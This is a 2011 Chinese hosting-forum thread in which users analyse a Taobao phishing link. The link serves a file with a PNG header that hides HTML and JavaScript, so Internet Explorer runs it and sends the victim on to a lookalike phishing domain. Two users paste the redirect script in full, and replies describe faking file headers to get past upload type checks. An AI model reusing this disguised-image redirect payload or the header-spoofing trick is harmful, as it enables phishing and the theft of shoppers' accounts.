全球主机交流论坛

标题: 看看这个跳转是怎么实现的(淘宝新的钓鱼连接) [打印本页]

作者: 挨个搞    时间: 2011-1-21 21:09
标题: 看看这个跳转是怎么实现的(淘宝新的钓鱼连接)
刚收到旺旺信息,内容很老套,但是连接很牛,旺旺也判定是安全连接
  1. 老板,在吗,这款还有货吗?,http://img.taobao.com/shop-logo/8a/T1WGhZXalsXXb1upjX?id=7641741 怎么拍不了啊,我要买7件啊
复制代码
连接域名是淘宝的,但是自动跳转到了钓鱼网站
觉得蛮牛的
不知道怎么实现的
高手谁知道的。。
作者: cnweb    时间: 2011-1-21 21:10
牛啊
作者: taian    时间: 2011-1-21 21:13
提示: 作者被禁止或删除 内容自动屏蔽
作者: 秋上书    时间: 2011-1-21 21:15
图片里面加木马了吧
作者: usa    时间: 2011-1-21 21:15
去taobao传张图片 来对比看看...
作者: yaoe    时间: 2011-1-21 21:17
png漏洞?
这玩意在opera上无效,应该是针对ie的
作者: 小牧    时间: 2011-1-21 21:17
骗子们真是煞费苦心啊
作者: 挨个搞    时间: 2011-1-21 21:18
淘宝自己商品的图片一般都是在这个域名下
http://img08.taobaocdn.com
作者: woaijay987    时间: 2011-1-21 21:19
这是某个官方图片空间的转换地址,现在有一种解释工具可以转换,跟官方差不多......黑客动画吧吧友回答的...
作者: 挨个搞    时间: 2011-1-21 21:20
opera下打开是这样一个代码
  1. 塒NG
  2. <html>

  3. <SCRIPT LANGUAGE="JavaScript">
  4. <!--
  5. function Request(strName)
  6. {
  7. var strHref = window.document.location.href;
  8. var intPos = strHref.indexOf("?");
  9. var strRight = strHref.substr(intPos + 1);

  10. var arrTmp = strRight.split("&");
  11. for(var i = 0; i < arrTmp.length; i++)
  12. {
  13. var arrTemp = arrTmp[i].split("=");

  14. if(arrTemp[0].toUpperCase() == strName.toUpperCase()) return arrTemp[1];
  15. }
  16. return "";
  17. }

  18. window.location.href="http://itam.taobao.cm.0drg.co.cc/h.taobao.com/tb1.asp?id="+Request("id");
  19. //-->

  20. </SCRIPT>



  21. </html>
  22. 
复制代码

作者: citydog    时间: 2011-1-21 21:22
原帖由 yaoe 于 2011-1-21 21:17 发表
png漏洞?
这玩意在opera上无效,应该是针对ie的


chrome下打开自动下载一个东西,用notepad打开是一个链接。
作者: wdlth    时间: 2011-1-21 21:22
就是个JavaScript
作者: woaijay987    时间: 2011-1-21 21:23
0drg.co.cc

免费域名呢...
作者: 兽兽    时间: 2011-1-21 21:41
在Firefox下无效 呵呵
作者: test100    时间: 2011-1-21 21:45
png果然是,ie.被挂了,啊哈哈。其他浏览器无效
作者: l12ab    时间: 2011-1-21 21:53
原帖由 兽兽 于 2011-1-21 21:41 发表
在Firefox下无效 呵呵

再次说明IE不可靠
作者: flylight    时间: 2011-1-21 22:17
CHROME 直接下载文件
作者: yansthisisit    时间: 2011-1-21 22:21
IE又被X了
作者: 诡谲    时间: 2011-1-21 22:32
IE 9下   无效~
直接提示下载.
作者: God    时间: 2011-1-21 22:54
修改文件头,骗过TAOBAO的文件类型识别,WEBSHELL常用的技俩,
作者: drivel    时间: 2011-1-21 22:57
IE only 的东西,无视
作者: yafeiml    时间: 2011-1-21 23:00
chrome
作者: xspoco    时间: 2011-1-21 23:03
我擦.真强大
作者: server    时间: 2011-1-21 23:29
自己看代码,不解释。
  1. <html>

  2. <SCRIPT LANGUAGE="JavaScript">
  3. <!--
  4. function Request(strName)
  5. {
  6. var strHref = window.document.location.href;
  7. var intPos = strHref.indexOf("?");
  8. var strRight = strHref.substr(intPos + 1);

  9. var arrTmp = strRight.split("&");
  10. for(var i = 0; i < arrTmp.length; i++)
  11. {
  12. var arrTemp = arrTmp.split("=");

  13. if(arrTemp[0].toUpperCase() == strName.toUpperCase()) return arrTemp[1];
  14. }
  15. return "";
  16. }

  17. window.location.href="http://itam.taobao.cm.0drg.co.cc/h.taobao.com/tb1.asp?id="+Request("id");
  18. //-->

  19. </SCRIPT>



  20. </html>
复制代码

作者: mslxd    时间: 2011-1-21 23:41
还是不错的,,做个记录也许有别的用处
作者: wske    时间: 2011-1-22 01:34
提示: 作者被禁止或删除 内容自动屏蔽
作者: xspoco    时间: 2011-1-22 02:01
貌似已经失效了
作者: yeqery    时间: 2011-1-22 04:14
IE真是啊




欢迎光临 全球主机交流论坛 (https://loc.1226.eu.org/) Powered by Discuz! X3.4